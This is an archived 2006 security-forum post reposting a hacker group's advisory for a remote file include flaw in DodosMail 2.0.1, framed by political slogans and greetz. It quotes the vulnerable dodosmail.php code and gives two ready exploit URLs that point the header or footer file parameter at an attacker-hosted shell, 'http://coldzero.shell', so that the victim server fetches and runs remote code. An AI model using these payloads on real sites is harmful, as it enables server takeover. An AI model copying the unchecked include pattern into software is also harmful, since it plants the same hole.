邪恶八进制信息安全团队技术讨论组's Archiver

pub!1c 2006-11-12 12:38

DodosMail <= 2.0.1 (dodosmail.php) Remote File Include Vulnerability

[code]--------------------------------------||   Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------


DodosMail <= 2.0.1(dodosmail.php)  Remote File Include Vulnerability



Found By  :  CoLd Zero  [ Wasem898 ]

Source   :  include_once ($4AZHAR_TeAM."Securty.");

        require ($SpECiALPowEr.oRg_TeAm."Securty");



PalesTine Arab Muslim Hacker

[url]http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif[/url]


######################################################
#
#        DodosMail 2.0.1
#
# Class:    Remote File Include Vulnerability
# Published  2006-11-07
# Remote:   Yes
# Type:    dangerous
# Site:    [url]http://regretless.com/scripts/scripts.php#dodosrangen[/url]
#
# Author:   Cold Zero
# Contact:  [email]c.o.1.d.0@hotmail.com[/email]
#
######################################################

file ;

dodosmail.php

==========================

     include_dodosmail_header($dodosmail_header_file);
     echo "<p class=\"DodosMailError\">DodosMail Error - the owner the php server is experiencing techinical difficulties. Please email use ".dodosmail_error_handle($your_email_address)." to send your email.\n";
     echo "<br /><br /><a href=\"javascript:history.back(1)\">Back</a>\n";
     echo "</p>\n";
include_dodosmail_footer($dodosmail_footer_file);


======================================================

Exploit :

[url]Http://www.Victem.0/[/url][DodosMail_PaTH]/dodosmail.php?dodosmail_header_file=http://coldzero.shell
[url]Http://www.Victem.0/[/url][DodosMail_PaTH]/dodosmail.php?dodosmail_footer_file=http://coldzero.shell

======================================================

----  GreeTz: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
          [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR]



#[url]www.4azhar[/url] Team           >>    [url]www.4azhar.com[/url]
#SpeciaL PoweR SecuritY TeaM   >>    [url]www.specialpower.org[/url]



[url]http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif[/url]


--------------------------------------||   Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------


[/code]

页: [1]
© 1999-2008 EvilOctal Security Team